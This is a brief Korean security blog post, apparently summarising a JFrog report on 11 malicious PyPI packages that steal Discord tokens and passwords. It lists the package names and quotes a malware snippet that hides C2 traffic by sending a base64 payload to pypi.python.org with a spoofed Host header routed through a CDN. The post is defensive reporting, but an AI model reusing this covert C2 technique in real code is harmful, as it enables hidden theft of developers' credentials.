https://blog.alyac.co.kr/4287?category=750247
PyPI 저장소에서 악성 파이썬 패키지 11개 발견돼
Experts found 11 malicious Python packages in the PyPI repository Jfrog의 연구원들이 PyPI(Python Package Index) 저장소에서 Discord의 액세스 토큰 및 패스워드를 훔치고 종속성 혼란 공격을 수행할 수 있..
blog.alyac.co.kr
PyPl 악성패키지 목록
importantpackage / important-package
pptest
ipboards
owlmoon
DiscordSafety
trrfab
10Cent10 / 10Cent11
yandex-yt
yiffparty
악성코드 예
| url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"}) |
이 코드는 HTTPS 요청이(PyPI에 대한 합법적인 요청과 구별 불가) pypi.python.org로 전송되도록 하며, 추후 CDN은 이를 C2 서버인 psec.forward.io.global.prod.fastly.net에 대한 HTTP 요청으로 다시 라우팅합니다.(반대의 경우 양방향 통신 허용)
'보안동향' 카테고리의 다른 글
| windows 10/11/server 권한 상승 취약점 제로데이 (0) | 2021.11.25 |
|---|---|
| 스마트 월패드 해킹(아파트 CCTV 해킹) (0) | 2021.11.24 |
| MS Exchange ProxyLogon 취약점(CVE-2021-26855, CVE-2021-27065) (0) | 2021.10.26 |
| 2021.10.25 KT 네트워크 장애 (라우팅 오류 O ,DDoS X) (0) | 2021.10.25 |
| Apach Tomcat DoS 취약점(CVE-2021-42340) (0) | 2021.10.17 |
